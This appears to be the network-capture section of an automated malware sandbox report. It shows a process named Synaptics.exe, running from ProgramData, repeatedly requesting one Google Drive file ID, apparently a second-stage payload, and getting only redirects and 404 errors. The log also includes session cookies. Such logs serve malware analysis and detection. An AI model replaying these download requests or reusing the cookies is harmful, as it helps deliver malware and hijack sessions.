2024-12-30 03:59:25 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6TLANqvCMWcSrkppG1c48bn83mKgqF89mNPCfLSJ0LsFV_ciBx8gsNBVBUadm-ah2Y
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:25 GMT
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-lh0Xnrz0v29jZ1yKny5Ggg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:25 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 03:59:25 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="timd0CZisH82900btgFh5w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 03:59:25 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.4 | 49835 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:24 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
2024-12-30 03:59:25 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:25 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-kHH4IWEqMq8ufUc5RTNUzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    60 | 192.168.2.4 | 49838 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:25 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:25 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4XE9ltO5sP3N1Ar8PTH5TeZoZyYCHQYswm3HTkYY2aozOCHcnr1TUfkjZboyloQwjgjW0gL5E
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:25 GMT
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-DrHxITUWqkpY9zOVZL--eQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:25 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:25 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="416aFCHKoNByvXO9nXW5rw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:25 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    61 | 192.168.2.4 | 49839 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:25 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:25 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:25 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-nJT7Dn9Kuslxx115pQ2gsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    62 | 192.168.2.4 | 49841 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:25 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    63 | 192.168.2.4 | 49842 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:26 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    64 | 192.168.2.4 | 49847 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:26 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:27 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:26 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-_gKih3Ll_MmJwjoZKP7Sqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    65 | 192.168.2.4 | 49848 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:26 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:27 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:26 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-GolrgSMSz8yArJ5u7Z0KVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    66 | 192.168.2.4 | 49849 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:27 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:28 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:27 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-A0j5z4E_Gy8pYtv-TofBbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    67 | 192.168.2.4 | 49851 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:27 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:28 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:27 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-e93lAh9uJvvNt4t-NiTcMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    68 | 192.168.2.4 | 49852 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:27 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:28 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC78TJ0s7w9-xVrnPC4666qZhtzBpabA4vOB160H6JXYtU6Fdo4rnzdYpAuZ1VKsEXBN
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:27 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-3QCZBTHJd1WzjAiyJ7Ckhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:28 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:28 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="NWjUKJ4_TOoWg4sMhl2Z-Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:28 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    69 | 192.168.2.4 | 49850 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
